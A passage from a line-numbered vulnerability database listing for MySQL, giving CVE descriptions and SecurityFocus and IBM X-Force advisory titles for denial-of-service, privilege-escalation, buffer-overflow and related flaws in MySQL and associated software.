14269| [CVE-2012-0540] Unspecified vulnerability in Oracle MySQL Server 5.1.62 and earlier and 5.5.23 and earlier allows remote authenticated users to affect availability, related to GIS Extension.
14270| [CVE-2012-0492] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0112, CVE-2012-0115, CVE-2012-0119, CVE-2012-0120, and CVE-2012-0485.
14271| [CVE-2012-0490] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x, 5.1.x, and 5.5.x allows remote authenticated users to affect availability via unknown vectors.
14272| [CVE-2012-0485] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0112, CVE-2012-0115, CVE-2012-0119, CVE-2012-0120, and CVE-2012-0492.
14273| [CVE-2012-0484] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x, 5.1.x, and 5.5.x allows remote authenticated users to affect confidentiality via unknown vectors.
14274| [CVE-2012-0120] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0112, CVE-2012-0115, CVE-2012-0119, CVE-2012-0485, and CVE-2012-0492.
14275| [CVE-2012-0119] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0112, CVE-2012-0115, CVE-2012-0120, CVE-2012-0485, and CVE-2012-0492.
14276| [CVE-2012-0118] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect confidentiality and availability via unknown vectors, a different vulnerability than CVE-2012-0113.
14277| [CVE-2012-0116] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
14278| [CVE-2012-0115] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0112, CVE-2012-0119, CVE-2012-0120, CVE-2012-0485, and CVE-2012-0492.
14279| [CVE-2012-0114] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x, 5.1.x, and 5.5.x allows local users to affect confidentiality and integrity via unknown vectors.
14280| [CVE-2012-0113] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect confidentiality and availability via unknown vectors, a different vulnerability than CVE-2012-0118.
14281| [CVE-2012-0112] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0115, CVE-2012-0119, CVE-2012-0120, CVE-2012-0485, and CVE-2012-0492.
14282| [CVE-2012-0102] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x and 5.1.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0087 and CVE-2012-0101.
14283| [CVE-2012-0101] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x and 5.1.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0087 and CVE-2012-0102.
14284| [CVE-2012-0087] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x and 5.1.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0101 and CVE-2012-0102.
14285| [CVE-2012-0075] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x, 5.1.x, and 5.5.x allows remote authenticated users to affect integrity via unknown vectors.
14286| [CVE-2011-2262] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote attackers to affect availability via unknown vectors.
14287| [CVE-2010-3840] The Gis_line_string::init_from_wkb function in sql/spatial.cc in MySQL 5.1 before 5.1.51 allows remote authenticated users to cause a denial of service (server crash) by calling the PolyFromWKB function with Well-Known Binary (WKB) data containing a crafted number of (1) line strings or (2) line points.
14288| [CVE-2010-3839] MySQL 5.1 before 5.1.51 and 5.5 before 5.5.6 allows remote authenticated users to cause a denial of service (infinite loop) via multiple invocations of a (1) prepared statement or (2) stored procedure that creates a query with nested JOIN statements.
14289| [CVE-2010-3838] MySQL 5.0 before 5.0.92, 5.1 before 5.1.51, and 5.5 before 5.5.6 allows remote authenticated users to cause a denial of service (server crash) via a query that uses the (1) GREATEST or (2) LEAST function with a mixed list of numeric and LONGBLOB arguments, which is not properly handled when the function's result is "processed using an intermediate temporary table."
14290| [CVE-2010-3837] MySQL 5.0 before 5.0.92, 5.1 before 5.1.51, and 5.5 before 5.5.6 allows remote authenticated users to cause a denial of service (server crash) via a prepared statement that uses GROUP_CONCAT with the WITH ROLLUP modifier, probably triggering a use-after-free error when a copied object is modified in a way that also affects the original object.
14291| [CVE-2010-3836] MySQL 5.0 before 5.0.92, 5.1 before 5.1.51, and 5.5 before 5.5.6 allows remote authenticated users to cause a denial of service (assertion failure and server crash) via vectors related to view preparation, pre-evaluation of LIKE predicates, and IN Optimizers.
14292| [CVE-2010-3835] MySQL 5.1 before 5.1.51 and 5.5 before 5.5.6 allows remote authenticated users to cause a denial of service (mysqld server crash) by performing a user-variable assignment in a logical expression that is calculated and stored in a temporary table for GROUP BY, then causing the expression value to be used after the table is created, which causes the expression to be re-evaluated instead of accessing its value from the table.
14293| [CVE-2010-3834] Unspecified vulnerability in MySQL 5.0 before 5.0.92, 5.1 before 5.1.51, and 5.5 before 5.5.6 allows remote authenticated users to cause a denial of service (server crash) via vectors related to "materializing a derived table that required a temporary table for grouping" and "user variable assignments."
14294| [CVE-2010-3833] MySQL 5.0 before 5.0.92, 5.1 before 5.1.51, and 5.5 before 5.5.6 does not properly propagate type errors, which allows remote attackers to cause a denial of service (server crash) via crafted arguments to extreme-value functions such as (1) LEAST and (2) GREATEST, related to KILL_BAD_DATA and a "CREATE TABLE ... SELECT."
14295| [CVE-2010-3683] Oracle MySQL 5.1 before 5.1.49 and 5.5 before 5.5.5 sends an OK packet when a LOAD DATA INFILE request generates SQL errors, which allows remote authenticated users to cause a denial of service (mysqld daemon crash) via a crafted request.
14296| [CVE-2010-3682] Oracle MySQL 5.1 before 5.1.49 and 5.0 before 5.0.92 allows remote authenticated users to cause a denial of service (mysqld daemon crash) by using EXPLAIN with crafted "SELECT ... UNION ... ORDER BY (SELECT ... WHERE ...)" statements, which triggers a NULL pointer dereference in the Item_singlerow_subselect::store function.
14297| [CVE-2010-3681] Oracle MySQL 5.1 before 5.1.49 and 5.5 before 5.5.5 allows remote authenticated users to cause a denial of service (mysqld daemon crash) by using the HANDLER interface and performing "alternate reads from two indexes on a table," which triggers an assertion failure.
14298| [CVE-2010-3680] Oracle MySQL 5.1 before 5.1.49 allows remote authenticated users to cause a denial of service (mysqld daemon crash) by creating temporary tables with nullable columns while using InnoDB, which triggers an assertion failure.
14299| [CVE-2010-3679] Oracle MySQL 5.1 before 5.1.49 allows remote authenticated users to cause a denial of service (mysqld daemon crash) via certain arguments to the BINLOG command, which triggers an access of uninitialized memory, as demonstrated by valgrind.
14300| [CVE-2010-3678] Oracle MySQL 5.1 before 5.1.49 allows remote authenticated users to cause a denial of service (crash) via (1) IN or (2) CASE operations with NULL arguments that are explicitly specified or indirectly provided by the WITH ROLLUP modifier.
14301| [CVE-2010-3677] Oracle MySQL 5.1 before 5.1.49 and 5.0 before 5.0.92 allows remote authenticated users to cause a denial of service (mysqld daemon crash) via a join query that uses a table with a unique SET column.
14302| [CVE-2010-3676] storage/innobase/dict/dict0crea.c in mysqld in Oracle MySQL 5.1 before 5.1.49 allows remote authenticated users to cause a denial of service (assertion failure) by modifying the (1) innodb_file_format or (2) innodb_file_per_table configuration parameters for the InnoDB storage engine, then executing a DDL statement.
14303| [CVE-2010-2008] MySQL before 5.1.48 allows remote authenticated users with alter database privileges to cause a denial of service (server crash and database loss) via an ALTER DATABASE command with a #mysql50# string followed by a . (dot), .. (dot dot), ../ (dot dot slash) or similar sequence, and an UPGRADE DATA DIRECTORY NAME command, which causes MySQL to move certain directories to the server data directory.
14304| [CVE-2010-1850] Buffer overflow in MySQL 5.0 through 5.0.91 and 5.1 before 5.1.47 allows remote authenticated users to execute arbitrary code via a COM_FIELD_LIST command with a long table name.
14305| [CVE-2010-1849] The my_net_skip_rest function in sql/net_serv.cc in MySQL 5.0 through 5.0.91 and 5.1 before 5.1.47 allows remote attackers to cause a denial of service (CPU and bandwidth consumption) by sending a large number of packets that exceed the maximum length.
14306| [CVE-2010-1848] Directory traversal vulnerability in MySQL 5.0 through 5.0.91 and 5.1 before 5.1.47 allows remote authenticated users to bypass intended table grants to read field definitions of arbitrary tables, and on 5.1 to read or delete content of arbitrary tables, via a .. (dot dot) in a table name.
14307| [CVE-2010-1626] MySQL before 5.1.46 allows local users to delete the data and index files of another user's MyISAM table via a symlink attack in conjunction with the DROP TABLE command, a different vulnerability than CVE-2008-4098 and CVE-2008-7247.
14308| [CVE-2010-1621] The mysql_uninstall_plugin function in sql/sql_plugin.cc in MySQL 5.1 before 5.1.46 does not check privileges before uninstalling a plugin, which allows remote attackers to uninstall arbitrary plugins via the UNINSTALL PLUGIN command.
14309| [CVE-2009-5026] The executable comment feature in MySQL 5.0.x before 5.0.93 and 5.1.x before 5.1.50, when running in certain slave configurations in which the slave is running a newer version than the master, allows remote attackers to execute arbitrary SQL commands via custom comments.
14310| [CVE-2009-4484] Multiple stack-based buffer overflows in the CertDecoder::GetName function in src/asn.cpp in TaoCrypt in yaSSL before 1.9.9, as used in mysqld in MySQL 5.0.x before 5.0.90, MySQL 5.1.x before 5.1.43, MySQL 5.5.x through 5.5.0-m2, and other products, allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption and daemon crash) by establishing an SSL connection and sending an X.509 client certificate with a crafted name field, as demonstrated by mysql_overflow1.py and the vd_mysql5 module in VulnDisco Pack Professional 8.11. NOTE: this was originally reported for MySQL 5.0.51a.
14311| [CVE-2009-4030] MySQL 5.1.x before 5.1.41 allows local users to bypass certain privilege checks by calling CREATE TABLE on a MyISAM table with modified (1) DATA DIRECTORY or (2) INDEX DIRECTORY arguments that are originally associated with pathnames without symlinks, and that can point to tables created at a future time at which a pathname is modified to contain a symlink to a subdirectory of the MySQL data home directory, related to incorrect calculation of the mysql_unpacked_real_data_home value. NOTE: this vulnerability exists because of an incomplete fix for CVE-2008-4098 and CVE-2008-2079.
14312| [CVE-2009-4028] The vio_verify_callback function in viosslfactories.c in MySQL 5.0.x before 5.0.88 and 5.1.x before 5.1.41, when OpenSSL is used, accepts a value of zero for the depth of X.509 certificates, which allows man-in-the-middle attackers to spoof arbitrary SSL-based MySQL servers via a crafted certificate, as demonstrated by a certificate presented by a server linked against the yaSSL library.
14313| [CVE-2009-4019] mysqld in MySQL 5.0.x before 5.0.88 and 5.1.x before 5.1.41 does not (1) properly handle errors during execution of certain SELECT statements with subqueries, and does not (2) preserve certain null_value flags during execution of statements that use the GeomFromWKB function, which allows remote authenticated users to cause a denial of service (daemon crash) via a crafted statement.
14314| [CVE-2009-0819] sql/item_xmlfunc.cc in MySQL 5.1 before 5.1.32 and 6.0 before 6.0.10 allows remote authenticated users to cause a denial of service (crash) via "an XPath expression employing a scalar expression as a FilterExpr with ExtractValue() or UpdateXML()," which triggers an assertion failure.
14315| [CVE-2008-7247] sql/sql_table.cc in MySQL 5.0.x through 5.0.88, 5.1.x through 5.1.41, and 6.0 before 6.0.9-alpha, when the data home directory contains a symlink to a different filesystem, allows remote authenticated users to bypass intended access restrictions by calling CREATE TABLE with a (1) DATA DIRECTORY or (2) INDEX DIRECTORY argument referring to a subdirectory that requires following this symlink.
14316| [CVE-2008-3963] MySQL 5.0 before 5.0.66, 5.1 before 5.1.26, and 6.0 before 6.0.6 does not properly handle a b'' (b single-quote single-quote) token, aka an empty bit-string literal, which allows remote attackers to cause a denial of service (daemon crash) by using this token in a SQL statement.
14317| [CVE-2008-2079] MySQL 4.1.x before 4.1.24, 5.0.x before 5.0.60, 5.1.x before 5.1.24, and 6.0.x before 6.0.5 allows local users to bypass certain privilege checks by calling CREATE TABLE on a MyISAM table with modified (1) DATA DIRECTORY or (2) INDEX DIRECTORY arguments that are within the MySQL home data directory, which can point to tables that are created in the future.
14318| [CVE-2007-6313] MySQL Server 5.1.x before 5.1.23 and 6.0.x before 6.0.4 does not check the rights of the entity executing BINLOG, which allows remote authorized users to execute arbitrary BINLOG statements.
14319| [CVE-2007-6304] The federated engine in MySQL 5.0.x before 5.0.51a, 5.1.x before 5.1.23, and 6.0.x before 6.0.4, when performing a certain SHOW TABLE STATUS query, allows remote MySQL servers to cause a denial of service (federated handler crash and daemon crash) via a response that lacks the minimum required number of columns.
14320| [CVE-2007-6303] MySQL 5.0.x before 5.0.51a, 5.1.x before 5.1.23, and 6.0.x before 6.0.4 does not update the DEFINER value of a view when the view is altered, which allows remote authenticated users to gain privileges via a sequence of statements including a CREATE SQL SECURITY DEFINER VIEW statement and an ALTER VIEW statement.
14321| [CVE-2007-5970] MySQL 5.1.x before 5.1.23 and 6.0.x before 6.0.4 allows remote authenticated users to gain privileges on arbitrary tables via unspecified vectors involving use of table-level DATA DIRECTORY and INDEX DIRECTORY options when creating a partitioned table with the same name as a table on which the user lacks privileges.
14322| [CVE-2007-5969] MySQL Community Server 5.0.x before 5.0.51, Enterprise Server 5.0.x before 5.0.52, Server 5.1.x before 5.1.23, and Server 6.0.x before 6.0.4, when a table relies on symlinks created through explicit DATA DIRECTORY and INDEX DIRECTORY options, allows remote authenticated users to overwrite system table information and gain privileges via a RENAME TABLE statement that changes the symlink to point to an existing file.
14323| [CVE-2007-5925] The convert_search_mode_to_innobase function in ha_innodb.cc in the InnoDB engine in MySQL 5.1.23-BK and earlier allows remote authenticated users to cause a denial of service (database crash) via a certain CONTAINS operation on an indexed column, which triggers an assertion error.
14324| [CVE-2007-2693] MySQL before 5.1.18 allows remote authenticated users without SELECT privileges to obtain sensitive information from partitioned tables via an ALTER TABLE statement.
14325| [CVE-2007-2692] The mysql_change_db function in MySQL 5.0.x before 5.0.40 and 5.1.x before 5.1.18 does not restore THD::db_access privileges when returning from SQL SECURITY INVOKER stored routines, which allows remote authenticated users to gain privileges.
14326| [CVE-2007-2691] MySQL before 4.1.23, 5.0.x before 5.0.42, and 5.1.x before 5.1.18 does not require the DROP privilege for RENAME TABLE statements, which allows remote authenticated users to rename arbitrary tables.
14327| [CVE-2007-2583] The in_decimal::set function in item_cmpfunc.cc in MySQL before 5.0.40, and 5.1 before 5.1.18-beta, allows context-dependent attackers to cause a denial of service (crash) via a crafted IF clause that results in a divide-by-zero error and a NULL pointer dereference.
14328| [CVE-2006-7232] sql_select.cc in MySQL 5.0.x before 5.0.32 and 5.1.x before 5.1.14 allows remote authenticated users to cause a denial of service (crash) via an EXPLAIN SELECT FROM on the INFORMATION_SCHEMA table, as originally demonstrated using ORDER BY.
14329| [CVE-2006-4227] MySQL before 5.0.25 and 5.1 before 5.1.12 evaluates arguments of suid routines in the security context of the routine's definer instead of the routine's caller, which allows remote authenticated users to gain privileges through a routine that has been made available using GRANT EXECUTE.
14330| [CVE-2006-4226] MySQL before 4.1.21, 5.0 before 5.0.25, and 5.1 before 5.1.12, when run on case-sensitive filesystems, allows remote authenticated users to create or access a database when the database name differs only in case from a database for which they have permissions.
14331| [CVE-2006-3486] ** DISPUTED ** Off-by-one buffer overflow in the Instance_options::complete_initialization function in instance_options.cc in the Instance Manager in MySQL before 5.0.23 and 5.1 before 5.1.12 might allow local users to cause a denial of service (application crash) via unspecified vectors, which triggers the overflow when the convert_dirname function is called. NOTE: the vendor has disputed this issue via e-mail to CVE, saying that it is only exploitable when the user has access to the configuration file or the Instance Manager daemon. Due to intended functionality, this level of access would already allow the user to disrupt program operation, so this does not cross security boundaries and is not a vulnerability.
14332| [CVE-2006-3081] mysqld in MySQL 4.1.x before 4.1.18, 5.0.x before 5.0.19, and 5.1.x before 5.1.6 allows remote authorized users to cause a denial of service (crash) via a NULL second argument to the str_to_date function.
14333| [CVE-2006-0200] Format string vulnerability in the error-reporting feature in the mysqli extension in PHP 5.1.0 and 5.1.1 might allow remote attackers to execute arbitrary code via format string specifiers in MySQL error messages.
14334|
14335| SecurityFocus - https://www.securityfocus.com/bid/:
14336| [47871] Oracle MySQL Prior to 5.1.52 Multiple Denial Of Service Vulnerabilities
14337| [43677] Oracle MySQL Prior to 5.1.50 Privilege Escalation Vulnerability
14338| [43676] Oracle MySQL Prior to 5.1.51 Multiple Denial Of Service Vulnerabilities
14339| [42646] Oracle MySQL Prior to 5.1.49 'JOIN' Statement Denial Of Service Vulnerability
14340| [42643] Oracle MySQL Prior to 5.1.49 'DDL' Statements Denial Of Service Vulnerability
14341| [42638] Oracle MySQL Prior to 5.1.49 Malformed 'BINLOG' Arguments Denial Of Service Vulnerability
14342| [42596] Oracle MySQL Prior to 5.1.49 'WITH ROLLUP' Denial Of Service Vulnerability
14343| [42586] RETIRED: Oracle MySQL Prior to 5.1.49 Multiple Denial Of Service Vulnerabilities
14344|
14345| IBM X-Force - https://exchange.xforce.ibmcloud.com:
14346| [85724] Oracle MySQL Server XA Transactions denial of service
14347| [85723] Oracle MySQL Server Server Replication denial of service
14348| [85722] Oracle MySQL Server InnoDB denial of service
14349| [85721] Oracle MySQL Server Server Privileges unspecified
14350| [85720] Oracle MySQL Server Server Partition denial of service
14351| [85719] Oracle MySQL Server Server Parser denial of service
14352| [85718] Oracle MySQL Server Server Options denial of service
14353| [85717] Oracle MySQL Server Server Options denial of service
14354| [85716] Oracle MySQL Server Server Optimizer denial of service
14355| [85715] Oracle MySQL Server Server Optimizer denial of service
14356| [85714] Oracle MySQL Server Prepared Statements denial of service
14357| [85713] Oracle MySQL Server InnoDB denial of service
14358| [85712] Oracle MySQL Server Full Text Search denial of service
14359| [85711] Oracle MySQL Server Data Manipulation Language denial of service
14360| [85710] Oracle MySQL Server Data Manipulation Language denial of service
14361| [85709] Oracle MySQL Server Audit Log unspecified
14362| [85708] Oracle MySQL Server MemCached unspecified
14363| [84846] Debian mysql-server package information disclosure
14364| [84375] Wireshark MySQL dissector denial of service
14365| [83554] Oracle MySQL Server Server Partition denial of service
14366| [83553] Oracle MySQL Server Server Locking denial of service
14367| [83552] Oracle MySQL Server Server Install unspecified
14368| [83551] Oracle MySQL Server Server Types denial of service
14369| [83550] Oracle MySQL Server Server Privileges unspecified
14370| [83549] Oracle MySQL Server InnoDB denial of service
14371| [83548] Oracle MySQL Server InnoDB denial of service
14372| [83547] Oracle MySQL Server Data Manipulation Language denial of service
14373| [83546] Oracle MySQL Server Stored Procedure denial of service
14374| [83545] Oracle MySQL Server Server Replication denial of service
14375| [83544] Oracle MySQL Server Server Partition denial of service
14376| [83543] Oracle MySQL Server Server Optimizer denial of service
14377| [83542] Oracle MySQL Server InnoDB denial of service
14378| [83541] Oracle MySQL Server Information Schema denial of service
14379| [83540] Oracle MySQL Server Data Manipulation Language denial of service
14380| [83539] Oracle MySQL Server Data Manipulation Language denial of service
14381| [83538] Oracle MySQL Server Server Optimizer unspecified
14382| [83537] Oracle MySQL Server MemCached denial of service
14383| [83536] Oracle MySQL Server Server Privileges unspecified
14384| [83535] Oracle MySQL Server Server Privileges unspecified
14385| [83534] Oracle MySQL Server Server unspecified
14386| [83533] Oracle MySQL Server Information Schema unspecified
14387| [83532] Oracle MySQL Server Server Locking unspecified
14388| [83531] Oracle MySQL Server Data Manipulation Language denial of service
14389| [83388] MySQL administrative login attempt detected
14390| [82963] Mambo MySQL database information disclosure
14391| [82946] Oracle MySQL buffer overflow
14392| [82945] Oracle MySQL buffer overflow
14393| [82895] Oracle MySQL and MariaDB geometry queries denial of service
14394| [81577] MySQL2JSON extension for TYPO3 unspecified SQL injection
14395| [81325] Oracle MySQL Server Server Privileges denial of service
14396| [81324] Oracle MySQL Server Server Partition denial of service
14397| [81323] Oracle MySQL Server Server Optimizer denial of service
14398| [81322] Oracle MySQL Server Server Optimizer denial of service
14399| [81321] Oracle MySQL Server Server denial of service
14400| [81320] Oracle MySQL Server MyISAM denial of service
14401| [81319] Oracle MySQL Server InnoDB denial of service
14402| [81318] Oracle MySQL Server InnoDB denial of service
14403| [81317] Oracle MySQL Server Server Locking denial of service
14404| [81316] Oracle MySQL Server Server denial of service
14405| [81315] Oracle MySQL Server Server Replication unspecified
14406| [81314] Oracle MySQL Server Server Replication unspecified
14407| [81313] Oracle MySQL Server Stored Procedure denial of service
14408| [81312] Oracle MySQL Server Server Optimizer denial of service
14409| [81311] Oracle MySQL Server Information Schema denial of service
14410| [81310] Oracle MySQL Server GIS Extension denial of service
14411| [80790] Oracle MySQL yaSSL buffer overflow
14412| [80553] Oracle MySQL and MariaDB salt security bypass
14413| [80443] Oracle MySQL Server unspecified code execution
14414| [80442] Oracle MySQL Server acl_get() buffer overflow
14415| [80440] Oracle MySQL Server table buffer overflow
14416| [80435] Oracle MySQL Server database privilege escalation
14417| [80434] Oracle MySQL Server COM_BINLOG_DUMP denial of service
14418| [80433] Oracle MySQL Server Stuxnet privilege escalation
14419| [80432] Oracle MySQL Server authentication information disclosure
14420| [79394] Oracle MySQL Server Server Installation information disclosure
14421| [79393] Oracle MySQL Server Server Replication denial of service
14422| [79392] Oracle MySQL Server Server Full Text Search denial of service
14423| [79391] Oracle MySQL Server Server denial of service
14424| [79390] Oracle MySQL Server Client information disclosure
14425| [79389] Oracle MySQL Server Server Optimizer denial of service
14426| [79388] Oracle MySQL Server Server Optimizer denial of service
14427| [79387] Oracle MySQL Server Server denial of service
14428| [79386] Oracle MySQL Server InnoDB Plugin denial of service
14429| [79385] Oracle MySQL Server InnoDB denial of service
14430| [79384] Oracle MySQL Server Client unspecified
14431| [79383] Oracle MySQL Server Server denial of service
14432| [79382] Oracle MySQL Server Protocol unspecified
14433| [79381] Oracle MySQL Server Information Schema unspecified
14434| [78954] SilverStripe MySQLDatabase.php information disclosure
14435| [78948] MySQL MyISAM table symlink
14436| [77865] MySQL unknown vuln
14437| [77864] MySQL sort order denial of service
14438| [77768] MySQLDumper refresh_dblist.php information disclosure
14439| [77177] MySQL Squid Access Report unspecified cross-site scripting
14440| [77065] Oracle MySQL Server Optimizer denial of service
14441| [77064] Oracle MySQL Server Optimizer denial of service
14442| [77063] Oracle MySQL Server denial of service
14443| [77062] Oracle MySQL InnoDB denial of service
14444| [77061] Oracle MySQL GIS Extension denial of service
14445| [77060] Oracle MySQL Server Optimizer denial of service
14446| [76189] MySQL unspecified error
14447| [76188] MySQL attempts security bypass
14448| [75287] MySQLDumper restore.php information disclosure
14449| [75286] MySQLDumper filemanagement.php directory traversal
14450| [75285] MySQLDumper main.php cross-site request forgery
14451| [75284] MySQLDumper install.php cross-site scripting
14452| [75283] MySQLDumper install.php file include
14453| [75282] MySQLDumper menu.php code execution
14454| [75022] Oracle MySQL Server Server Optimizer denial of service
14455| [75021] Oracle MySQL Server Server Optimizer denial of service
14456| [75020] Oracle MySQL Server Server DML denial of service
14457| [75019] Oracle MySQL Server Partition denial of service
14458| [75018] Oracle MySQL Server MyISAM denial of service
14459| [75017] Oracle MySQL Server Server Optimizer denial of service
14460| [74672] Oracle MySQL Server multiple unspecified
14461| [73092] MySQL unspecified code execution
14462| [72540] Oracle MySQL Server denial of service
14463| [72539] Oracle MySQL Server unspecified
14464| [72538] Oracle MySQL Server denial of service
14465| [72537] Oracle MySQL Server denial of service
14466| [72536] Oracle MySQL Server unspecified
14467| [72535] Oracle MySQL Server denial of service
14468| [72534] Oracle MySQL Server denial of service
14469| [72533] Oracle MySQL Server denial of service
14470| [72532] Oracle MySQL Server denial of service
14471| [72531] Oracle MySQL Server denial of service
14472| [72530] Oracle MySQL Server denial of service
14473| [72529] Oracle MySQL Server denial of service
14474| [72528] Oracle MySQL Server denial of service
14475| [72527] Oracle MySQL Server denial of service
14476| [72526] Oracle MySQL Server denial of service
14477| [72525] Oracle MySQL Server information disclosure
14478| [72524] Oracle MySQL Server denial of service
14479| [72523] Oracle MySQL Server denial of service
14480| [72522] Oracle MySQL Server denial of service
14481| [72521] Oracle MySQL Server denial of service
14482| [72520] Oracle MySQL Server denial of service
14483| [72519] Oracle MySQL Server denial of service
14484| [72518] Oracle MySQL Server unspecified
14485| [72517] Oracle MySQL Server unspecified
14486| [72516] Oracle MySQL Server unspecified
14487| [72515] Oracle MySQL Server denial of service
14488| [72514] Oracle MySQL Server unspecified
14489| [71965] MySQL port denial of service
14490| [70680] DBD::mysqlPP unspecified SQL injection
14491| [70370] TaskFreak! multi-mysql unspecified path disclosure
14492| [68799] mod_authnz_external module for Apache mysql-auth.pl SQL injection
14493| [68294] MySQLDriverCS statement.cs sql injection
14494| [68175] Prosody MySQL denial of service
14495| [67539] Zend Framework MySQL PDO security bypass
14496| [67254] DirectAdmin MySQL information disclosure
14497| [66567] Xoops mysql.sql information disclosure
14498| [65871] PyWebDAV MySQLAuthHandler class SQL injection
14499| [65543] MySQL Select Arbitrary data into a File
14500| [65529] MySQL Eventum full_name field cross-site scripting
14501| [65380] Oracle MySQL Eventum forgot_password.php cross-site scripting
14502| [65379] Oracle MySQL Eventum list.php cross-site scripting
14503| [65266] Accellion File Transfer Appliance MySQL default password
14504| [64878] MySQL Geometry denial of service
14505| [64877] MySQL EXPLAIN EXTENDED denial of service
14506| [64876] MySQL prepared statement denial of service
14507| [64845] MySQL extreme-value denial of service
14508| [64844] MySQL Gis_line_string::init_from_wkb denial of service
14509| [64843] MySQL user-variable denial of service
14510| [64842] MySQL view preparation denial of service
14511| [64841] MySQL prepared statement denial of service
14512| [64840] MySQL LONGBLOB denial of service
14513| [64839] MySQL invocations denial of service
14514| [64838] MySQL Gis_line_string::init_from_wkb denial of service
14515| [64689] MySQL dict0crea.c denial of service
14516| [64688] MySQL SET column denial of service
14517| [64687] MySQL BINLOG command denial of service
14518| [64686] MySQL InnoDB denial of service
14519| [64685] MySQL HANDLER interface denial of service
14520| [64684] MySQL Item_singlerow_subselect::store denial of service
14521| [64683] MySQL OK packet denial of service
14522| [63518] MySQL Query Browser GUI Tools information disclosure
14523| [63517] MySQL Administrator GUI Tools information disclosure
14524| [62272] MySQL PolyFromWKB() denial of service
14525| [62269] MySQL LIKE predicates denial of service
14526| [62268] MySQL joins denial of service
14527| [62267] MySQL GREATEST() or LEAST() denial of service
14528| [62266] MySQL GROUP_CONCAT() denial of service
14529| [62265] MySQL expression values denial of service
14530| [62264] MySQL temporary table denial of service
14531| [62263] MySQL LEAST() or GREATEST() denial of service
14532| [62262] MySQL replication privilege escalation
14533| [61739] MySQL WITH ROLLUP denial of service
14534| [61343] MySQL LOAD DATA INFILE denial of service
14535| [61342] MySQL EXPLAIN denial of service
14536| [61341] MySQL HANDLER denial of service
14537| [61340] MySQL BINLOG denial of service
14538| [61339] MySQL IN() or CASE denial of service
14539| [61338] MySQL SET denial of service
14540| [61337] MySQL DDL denial of service
14541| [61318] PHP mysqlnd_wireprotocol.c buffer overflow
14542| [61317] PHP php_mysqlnd_read_error_from_line buffer overflow
14543| [61316] PHP php_mysqlnd_auth_write buffer overflow
14544| [61274] MySQL TEMPORARY InnoDB denial of service
14545| [59905] MySQL ALTER DATABASE denial of service
14546| [59841] CMySQLite updateUser.php cross-site request forgery
14547| [59112] MySQL Enterprise Monitor unspecified cross-site request forgery
14548| [59075] PHP php_mysqlnd_auth_write() buffer overflow
14549| [59074] PHP php_mysqlnd_read_error_from_line() buffer overflow
14550| [59073] PHP php_mysqlnd_rset_header_read() buffer overflow
14551| [59072] PHP php_mysqlnd_ok_read() information disclosure
14552| [58842] MySQL DROP TABLE file deletion
14553| [58676] Template Shares MySQL information disclosure
14554| [58531] MySQL COM_FIELD_LIST buffer overflow
14555| [58530] MySQL packet denial of service
14556| [58529] MySQL COM_FIELD_LIST security bypass
14557| [58311] ClanSphere the captcha generator and MySQL driver SQL injection
14558| [57925] MySQL UNINSTALL PLUGIN security bypass
14559| [57006] Quicksilver Forums mysqldump information disclosure
14560| [56800] Employee Timeclock Software mysqldump information disclosure
14561| [56200] Flex MySQL Connector ActionScript SQL injection
14562| [55877] MySQL yaSSL buffer overflow
14563| [55622] kiddog_mysqldumper extension for TYPO3 information disclosure
14564| [55416] MySQL unspecified buffer overflow
14565| [55382] Ublog UblogMySQL.sql information disclosure
14566| [55251] PHP-MySQL-Quiz editquiz.php SQL injection
14567| [54597] MySQL sql_table.cc security bypass
14568| [54596] MySQL mysqld denial of service
14569| [54365] MySQL OpenSSL security bypass
14570| [54364] MySQL MyISAM table symlink
14571| [53950] The mysql-ocaml mysql_real_escape_string weak security
14572| [52978] Zmanda Recovery Manager for MySQL mysqlhotcopy privilege escalation
14573| [52977] Zmanda Recovery Manager for MySQL socket-server.pl command execution
14574| [52660] iScouter PHP Web Portal MySQL Password Retrieval
14575| [52220] aa33code mysql.inc information disclosure
14576| [52122] MySQL Connector/J unicode SQL injection
14577| [51614] MySQL dispatch_command() denial of service
14578| [51406] MySQL Connector/NET SSL spoofing
14579| [49202] MySQL UDF command execution
14580| [49050] MySQL XPath denial of service
14581| [48919] Cisco Application Networking Manager MySQL default account password
14582| [48163] libapache2-mod-auth-mysql module for Debian multibyte encoding SQL injection
14583| [47544] MySQL Calendar index.php SQL injection
14584| [47476] MySQL Calendar index.php nodstrumCalendarV2 security bypass
14585| [45649] MySQL MyISAM symlink security bypass
14586| [45648] MySQL MyISAM symlinks security bypass
14587| [45607] MySQL Quick Admin actions.php file include
14588| [45606] MySQL Quick Admin index.php file include
14589| [45590] MySQL command-line client cross-site scripting
14590| [45436] PromoteWeb MySQL go.php SQL injection
